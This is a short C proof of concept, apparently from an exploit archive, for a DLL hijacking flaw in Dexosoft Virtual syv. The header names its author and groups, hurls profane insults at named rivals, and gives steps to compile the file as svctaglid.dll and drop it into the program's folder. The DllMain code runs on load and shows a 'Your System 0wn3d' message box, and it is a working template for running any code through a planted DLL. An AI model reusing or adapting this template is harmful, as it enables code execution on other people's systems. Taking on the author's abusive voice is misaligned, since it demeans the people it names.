/* #Dexosoft Virtual syv DLL Hijacking Exploit (svctaglid.dll ) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Vendor : http://www.dexosoft.com #Tested on: Windows XP sp3 ------------------------------ Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck you kids ------------------------------- [>>] Compile code as svctaglid.dll [>>] Move DLL file to the directory where Dexosoft Virtual syv is installed [>>] check the result --> Your System 0wn3d BY anT!-Tr0J4n ========================== #svctaglid.dll(code) */ #include "stdafx.h" void init() { MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }